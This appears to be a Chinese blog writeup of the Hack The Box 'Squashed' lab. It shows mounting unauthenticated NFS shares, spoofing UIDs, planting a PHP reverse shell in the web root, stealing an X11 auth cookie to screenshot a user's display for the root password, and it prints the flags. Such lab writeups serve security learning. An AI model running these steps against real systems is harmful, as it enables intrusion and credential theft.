首页 > 其他分享 >HTB:Squashed[WriteUP]

HTB:Squashed[WriteUP]

时间:2024-11-15 21:46:38浏览次数:3  
标签:Squashed test2 4096 WriteUP ls 2022 ross root HTB

目录

连接至HTB服务器并启动靶机

使用rustscan对靶机TCP端口进行开放扫描

使用nmap对靶机开放端口进行脚本、服务扫描

使用浏览器访问靶机80端口页面

使用showmount列出靶机上的NFS共享

新建一个test用户

使用Kali自带的PHP_REVERSE_SHELL并复制到一号挂载点

尝试使用curl直接访问该文件以获取反弹shell

USER_FLAG:e9fe2fd732daac4d51f58de5739109ee

特权提升

ROOT_FLAG:94844ffb8c66ad08cff2878a24f9b393


连接至HTB服务器并启动靶机

靶机IP:10.10.11.191

分配IP:10.10.16.7


使用rustscan对靶机TCP端口进行开放扫描

靶机开放端口:22,80,111,2049,35435,37449,37537,38139

使用nmap对靶机开放端口进行脚本、服务扫描

nmap -p22,80,111,2049,35435,37449,37537,38139 -sCV 10.10.11.191


使用浏览器访问靶机80端口页面

经过ffuf、dirbuster大量的路径扫描,我几乎可以断定这是个纯静态的Web

尝试从其他端口下手,我注意到2049端口托管的NFS服务经过百度知道它是无需认证的

使用showmount列出靶机上的NFS共享

showmount -e 10.10.11.191

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross    *
/var/www/html *

本机进入/mnt目录下并新建两个目录

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# cd /mnt                   
                                                                                                                            
┌──(root㉿kali)-[/mnt]
└─# mkdir 1 2
                                                                                                                            
┌──(root㉿kali)-[/mnt]
└─# ls
1  2

将靶机上的两个共享分别挂载到本地

mount -t nfs 10.10.11.191:/var/www/html /mnt/1
mount -t nfs 10.10.11.191:/home/ross /mnt/2

┌──(root㉿kali)-[/mnt]
└─# mount -t nfs 10.10.11.191:/var/www/html /mnt/1
                                                                                                                            
┌──(root㉿kali)-[/mnt]
└─# mount -t nfs 10.10.11.191:/home/ross /mnt/2

查看一号挂载点权限

ls -al 1

┌──(root㉿kali)-[/mnt]
└─# ls -al 1   
ls: 无法访问 '1/.': 权限不够
ls: 无法访问 '1/..': 权限不够
ls: 无法访问 '1/.htaccess': 权限不够
ls: 无法访问 '1/index.html': 权限不够
ls: 无法访问 '1/images': 权限不够
ls: 无法访问 '1/css': 权限不够
ls: 无法访问 '1/js': 权限不够
总计 0
d????????? ? ? ? ?              ? .
d????????? ? ? ? ?              ? ..
?????????? ? ? ? ?              ? css
?????????? ? ? ? ?              ? .htaccess
?????????? ? ? ? ?              ? images
?????????? ? ? ? ?              ? index.html
?????????? ? ? ? ?              ? js

查看二号挂载点权限

ls -al 2

查看一号挂载点所属用户ID与组

ls -ld 1

┌──(root㉿kali)-[/mnt]
└─# ls -ld 1
drwxr-xr-- 5 2017 www-data 4096 11月15日 03:20 1

查看二号挂载点所属用户ID与组

ls -ld 2

┌──(root㉿kali)-[/mnt]
└─# ls -ld 2
drwxr-xr-x 14 1001 1001 4096 11月14日 19:30 2

因为NFS完全没有任何身份验证过程,所以我们直接伪造一个ID为2017的用户即可通行一号挂载点

新建一个test用户

useradd test

将test用户ID修改为2017

usermod -u 2017 test

将test用户组ID修改为2017

groupmod -g 2017 test

查看/etc/passwd看用户是否成功添加

cat /etc/passwd

切换到test用户并查看挂载点1文件权限分配情况

su test

┌──(root㉿kali)-[/mnt]
└─# su test              
$ whoami
test

ls -al /mnt/1

$ ls
1  2
$ ls -al /mnt/1
总计 56
drwxr-xr-- 5 test www-data  4096 11月15日 03:35 .
drwxr-xr-x 4 root root      4096 11月15日 03:16 ..
drwxr-xr-x 2 test www-data  4096 11月15日 03:35 css
-rw-r--r-- 1 test www-data    44 2022年10月21日 .htaccess
drwxr-xr-x 2 test www-data  4096 11月15日 03:35 images
-rw-r----- 1 test www-data 32532 11月15日 03:35 index.html
drwxr-xr-x 2 test www-data  4096 11月15日 03:35 js


使用Kali自带的PHP_REVERSE_SHELL并复制到一号挂载点

$ ls /tmp
php-reverse-shell.php(我这里提前将Webshell拷贝到了/tmp目录下)
snap-private-tmp
systemd-private-1ae1219c28e04757bc3654c13141c455-haveged.service-bngsxp
systemd-private-1ae1219c28e04757bc3654c13141c455-ModemManager.service-kCmvAH
systemd-private-1ae1219c28e04757bc3654c13141c455-polkit.service-YiWHD2
systemd-private-1ae1219c28e04757bc3654c13141c455-systemd-logind.service-NRolyk
VMwareDnD
vmware-root_692-2696942994

$ cp /tmp/php-reverse-shell.php .
$ ls
css  images  index.html  js  php-reverse-shell.php
$ pwd
/mnt/1

本地侧nc开始监听

nc -lvp 1425

尝试使用curl直接访问该文件以获取反弹shell

curl http://10.10.11.191/php-reverse-shell.php

本地侧nc收到回显

┌──(root㉿kali)-[/tmp]
└─# nc -lvp 1425                                          
listening on [any] 1425 ...
10.10.11.191: inverse host lookup failed: Unknown host
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.191] 51582
Linux squashed.htb 5.4.0-131-generic #147-Ubuntu SMP Fri Oct 14 17:07:22 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
 08:39:47 up  8:09,  1 user,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               00:30    8:09m 23.58s  0.01s /usr/libexec/gnome-session-binary --systemd --session=gnome
uid=2017(alex) gid=2017(alex) groups=2017(alex)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
alex

查找user_flag并查看其内容

$ find / -name 'user.txt' 2>/dev/null
/home/alex/user.txt
$ cat /home/alex/user.txt
e9fe2fd732daac4d51f58de5739109ee

USER_FLAG:e9fe2fd732daac4d51f58de5739109ee


特权提升

提升TTY

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看/etc/exports文件内容

cat /etc/exports

这里显示/home/ross所有用户可访问,我尝试直接用当前用户读取相关文件却提示权限不足

cd /home/ross

alex@squashed:/$ cd /home/ross
cd /home/ross
alex@squashed:/home/ross$ ls
ls
Desktop  Documents  Downloads  Music  Pictures  Public  Templates  Videos

列出所有文件及其权限

ls -al

这里的Xauthority是X协议认证相关文件

alex@squashed:/home/ross$ ls -al
ls -al
total 68
drwxr-xr-x 14 ross ross 4096 Nov 15 00:30 .
drwxr-xr-x  4 root root 4096 Oct 21  2022 ..
-rw-------  1 ross ross   57 Nov 15 00:30 .Xauthority
lrwxrwxrwx  1 root root    9 Oct 20  2022 .bash_history -> /dev/null
drwx------ 11 ross ross 4096 Oct 21  2022 .cache
drwx------ 12 ross ross 4096 Oct 21  2022 .config
drwx------  3 ross ross 4096 Oct 21  2022 .gnupg
drwx------  3 ross ross 4096 Oct 21  2022 .local
lrwxrwxrwx  1 root root    9 Oct 21  2022 .viminfo -> /dev/null
-rw-------  1 ross ross 2475 Nov 15 00:30 .xsession-errors
-rw-------  1 ross ross 2475 Dec 27  2022 .xsession-errors.old
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Desktop
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Documents
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Downloads
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Music
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Pictures
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Public
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Templates
drwxr-xr-x  2 ross ross 4096 Oct 21  2022 Videos
alex@squashed:/home/ross$ cat .Xauthority
cat .Xauthority
cat: .Xauthority: Permission denied

如法炮制弄一个test2用户,将UID、GID设置成1001

┌──(root㉿kali)-[/mnt/1]
└─# useradd test2  
                                                                                                                            
┌──(root㉿kali)-[/mnt/1]
└─# usermod -u 1001 test2
                                                                                                                            
┌──(root㉿kali)-[/mnt/1]
└─# groupmod -g 1001 test2

切换到test2用户,并访问二号挂载点

su test2 && cd /mnt/2

$ ls -al
总计 68
drwxr-xr-x 14 test2 test2 4096 11月14日 19:30 .
drwxr-xr-x  4 root  root  4096 11月15日 03:16 ..
lrwxrwxrwx  1 root  root     9 2022年10月20日 .bash_history -> /dev/null
drwx------ 11 test2 test2 4096 2022年10月21日 .cache
drwx------ 12 test2 test2 4096 2022年10月21日 .config
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Desktop
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Documents
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Downloads
drwx------  3 test2 test2 4096 2022年10月21日 .gnupg
drwx------  3 test2 test2 4096 2022年10月21日 .local
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Music
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Pictures
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Public
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Templates
drwxr-xr-x  2 test2 test2 4096 2022年10月21日 Videos
lrwxrwxrwx  1 root  root     9 2022年10月21日 .viminfo -> /dev/null
-rw-------  1 test2 test2   57 11月14日 19:30 .Xauthority
-rw-------  1 test2 test2 2475 11月14日 19:30 .xsession-errors
-rw-------  1 test2 test2 2475 2022年12月27日 .xsession-errors.old

尝试直接用cat读取.Xauthority文件内容会出现乱码,将其进行一次BASE64编码

$ cat .Xauthority

squashed.htb0MIT-MAGIC-COOKIE-1�e��~b�K��>���$
$ cat .Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDcZejrBX5ixku3F/k+iZz2

AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDcZejrBX5ixku3F/k+iZz2

将该文件还原到靶机/tmp目录下

cd /tmp && echo 'AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABDcZejrBX5ixku3F/k+iZz2' | base64 -d > .Xauthorit

alex@squashed:/tmp$ ls -al
ls -al
total 12
drwxrwxrwt  2 root root 4096 Nov 15 12:56 .
drwxr-xr-x 20 root root 4096 Oct 21  2022 ..
-rw-rw-rw-  1 alex alex   57 Nov 15 12:56 .Xauthorit

首先读取靶机系统内XAUTHORITY环境变量配置

echo $XAUTHORITY

alex@squashed:/tmp$ echo $XAUTHORITY
echo $XAUTHORITY

发现毛都没写,那我们直接往里写入.Xauthorit文件路径即可

realpath .Xauthorit

alex@squashed:/tmp$ ls -al
ls -al
total 12
drwxrwxrwt  2 root root 4096 Nov 15 12:56 .
drwxr-xr-x 20 root root 4096 Oct 21  2022 ..
-rw-rw-rw-  1 alex alex   57 Nov 15 12:56 .Xauthorit
alex@squashed:/tmp$ realpath .Xauthorit
realpath .Xauthorit
/tmp/.Xauthorit

于此同时,执行w命令可见当前系统中ross用户登陆中并且使用的是0号显示器

w

通过临时地将.Xauthority添加到XAUTHORITY环境变量中并截取ross用户屏幕

(感觉这题纯属抖机灵,谁没事屏幕上一直放着root密码?)

XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/res.xwd

alex@squashed:/tmp$ XAUTHORITY=/tmp/.Xauthority xwd -root -screen -silent -display :0 > /tmp/res.xwd
<wd -root -screen -silent -display :0 > /tmp/res.xwd
alex@squashed:/tmp$ ls -al
ls -al
total 1892
drwxrwxrwt  2 root root    4096 Nov 15 13:20 .
drwxr-xr-x 20 root root    4096 Oct 21  2022 ..
-rw-rw-rw-  1 alex alex      57 Nov 15 13:19 .Xauthority
-rw-rw-rw-  1 alex alex 1923179 Nov 15 13:20 res.xwd

靶机中通过python3开启一个http服务

python3 -m http.server 6666

攻击机将res.xwd文件下载到本地

wget http://10.10.11.191:6666/res.xwd -O res.xwd

将res.xwd格式转换为png

convert res.xwd res.png

直接打开该png文件获得密码:cah$mei7rai9A


我尝试使用上述密码登录到:root、ross用户均失败了不知什么原因

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'cah$mei7rai9A' ssh [email protected]   
Permission denied, please try again.
                                                                                                                                
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'cah$mei7rai9A' ssh [email protected]
Permission denied, please try again.

直接在靶机alex用户中尝试切换到root用户

su root

alex@squashed:/$ su root
su root
Password: cah$mei7rai9A

root@squashed:/# whoami
whoami
root

查找root_flag位置并查看其内容

root@squashed:/# find / -name 'root.txt'
find / -name 'root.txt'
/root/root.txt
root@squashed:/# cat /root/root.txt
cat /root/root.txt
94844ffb8c66ad08cff2878a24f9b393

ROOT_FLAG:94844ffb8c66ad08cff2878a24f9b393

标签:Squashed,test2,4096,WriteUP,ls,2022,ross,root,HTB
From: https://blog.csdn.net/qq_43007452/article/details/143785417

相关文章

  • Pwn VM writeup
    国赛期间,做了一个很有意思的pwn题,顺便学了一下现在常见的pwn的板子题是什么样子的,这里做一下记录MagicVM题目逻辑题目本身其实非常的有趣,它实现了一个简易流水线的功能,程序中包含四个结构体,其中三个分别对应流水线中的三个流程:IDALUMEM程序用一个叫做vm的结构体来统......
  • 红日七靶场--Writeup
     环境下载地址http://vulnstack.qiyuanxuetang.net/vuln/detail/9/前置配置环境拓扑网络编辑(这里桥接模式的网段不能通第二层也就是52的网段,笔记中桥接模式无法联网所以使用了52的nat网段)DMZ区域:-给Ubuntu(Web1)配置了两个网卡,一个桥接可以对外提供服务;一个连接在......
  • HTB-网络请求
    网络请求HTTP基础HTTP协议大多数互联网通讯是通过http协议来进行的web请求http协议是用于访问万维网资源的应用程序级的协议,http协议也被称为超文本传输协议,其中超文本代表着包含到其他资链接的文本和用户可以轻松理解的文本http通信由客户端和服务器组成,其中客户端向服务器......
  • 2024 强网杯逆向 Writeups
    最心有余而力不足的一集,做完vm颈椎病犯了,第二天根本打。最后,加上学弟学妹打的,最后剩一个Android逆向没AK,要是没有颈椎病这一说肯定AK了。感觉快退役了...mips编译一个qemu-6.2.0mips-linux-userbindiff一下恢复符号,怀疑修改了ELFloader或者syscall,最后发现是后者......
  • 2024年第四届“网鼎杯”网络安全大赛 青龙组 MICS-WriteUp
    文章目录一、前言二、MISCMISC01MICS02MISC03MICS04一、前言两年一届的网络安全"奥运会"也是有幸参加!是一个非常有意思的比赛,其余附件及需要的工具已打包完毕~123网盘下载:https://www.123684.com/s/q2J1jv-MuJvd提取码:0905提取码:0905二、MISCMISC01解......
  • HTB-Cicada 靶机笔记
    Cicada靶机笔记概述HTB的靶机Cicada靶机靶机地址:https://app.hackthebox.com/machines/Cicada很有意思且简单的windows靶机,这台靶机多次利用了信息枚举,利用不同的信息一步一步获得root权限一、nmap扫描1)端口扫描-sTtcp全连接扫描--min-rate以最低速率10000......
  • Misc_BUUCTF_WriteUp | 面具下的flag
    题目分析010Editor打开图片,发现末尾存在一段unknownPadding,有明显的zip文件特征,复制出来保存为zip文件1.zip。解压缩提示需要密码。010Editor重新查看1.zip,发现record(压缩源文件数据区)的reFlags为偶数0000,即未加密,但dirEntry(压缩源文件目录区)的deFlags......
  • BuildCTF 2024 Writeup - by 涉海蜉蝣
    BuildCTF2024Writeup-by涉海蜉蝣MiscEZ_ZIP-bysorin010查找分析发现压缩包,使用foremost分离疑似套娃压缩包,使用开源软件extractnow或者脚本都可以批量压缩,这里使用extractnow得到flagHEX的秘密-bysorin16进制每两位截取一次转10进制,对比Build的前几个字符......
  • HTB打靶记录-Infiltrator
    nmapscannmap-A10.10.11.31StartingNmap7.94SVN(https://nmap.org)at2024-10-1513:18CSTNmapscanreportforinfiltrator.htb(10.10.11.31)Hostisup(0.46slatency).Notshown:987filteredtcpports(no-response)PORTSTATESERVICE......
  • 2024Ciscn总决赛Web Writeup
    前言鸽了三个月的复现计划:)ezjs考点是express引擎解析的一个trick,在高版本的express已经修复,先贴源码constexpress=require('express');constejs=require('ejs')constsession=require('express-session');constbodyParse=require('body-parser');co......